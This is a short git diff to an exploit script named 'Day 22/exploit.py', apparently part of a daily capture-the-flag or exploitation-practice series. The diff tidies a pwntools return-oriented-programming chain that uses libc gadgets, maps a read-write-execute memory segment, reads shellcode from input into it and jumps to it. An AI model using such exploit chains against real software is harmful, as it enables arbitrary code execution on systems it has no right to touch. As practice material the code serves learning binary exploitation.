diff --git a/Day 22/exploit.py b/Day 22/exploit.py
index e9c569f..136d569 100755
--- a/Day 22/exploit.py	
+++ b/Day 22/exploit.py	
@@ -88,8 +88,9 @@ def try_char(offset, char):
 
         pop_rdi_ret = rop.find_gadget(["pop rdi", "ret"])
         pop_rcx_ret = rop.find_gadget(["pop rcx", "ret"])
+        ret         = rop.find_gadget(['ret'])
 
-        rop.raw(rop.find_gadget(['ret']))
+        rop.raw(ret)
         rop.raw(pop_rcx_ret)
         rop.raw(32)
         rop.raw(pop_rdi_ret)
@@ -101,9 +102,7 @@ def try_char(offset, char):
         else:
             rop.raw(libc.address + 0x54d69) # shl r9, cl ; mov qword ptr [rdi], r9 ; ret
 
-        rop.raw(rop.find_gadget(['ret']))
         rop.mmap(new_segment, 0x1000, 7, 0x2|0x20) # MAP_ANONYMOUS|MAP_PRIVATE
-
         rop.read(0, new_segment, 100)
         rop.call(new_segment)